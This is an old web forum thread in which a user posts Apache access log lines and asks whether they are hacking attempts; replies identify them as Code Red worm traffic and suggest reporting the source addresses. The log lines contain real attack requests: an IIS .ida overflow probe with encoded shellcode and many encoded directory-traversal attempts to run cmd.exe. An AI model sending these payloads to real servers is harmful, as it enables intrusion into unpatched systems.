apache access log

[Guest quakey]

Hi,

 

Frequently I got the following lines in the access log:

 

68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor"

68.165.90.188 - - [29/Jul/2003:20:44:57 -0700] "GET /default.ida?XXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:02 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:03 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:05 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:07 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:08 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:10 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:12 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:13 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:17 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:18 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:20 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

68.83.63.234 - - [29/Jul/2003:20:45:21 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

 

 

What are those? ppl trying to hack my server? Thank you.

[paul]

welcome to the club :roll: everybody gets those :roll:

 

do you remember code red ??? the IIS and Personal Web Server worm? ... well thats what that is that you are seeing

[tyme]

thankfully you have nothing to worry about! so just ignore it ;-) if the IP it's coming from is frequently the same, i would jump over to arin.net, do a whois on it,

and send an email off to whomever the address block it's in belongs to (i would look for an abuse email address or possibly the tech email address). help stop the spread of the worm! :)

[Guest anon]

Hey tyme, just had to scroll three miles to the right to read your post

[tyme]

Hey tyme, just had to scroll three miles to the right to read your post

not my fault! it was the length of the original post which caused the stretched box.

but i dropped a return into my post so that people wouldn't have to scroll :) (or atleast not much...not sure if it renders much differently on my 1600x1200 screen as it would on smaller resolutions)

[Guest anon]

Your right again tyme, sorry

Edited the first post to make it shorter, now its only a one mile scroll.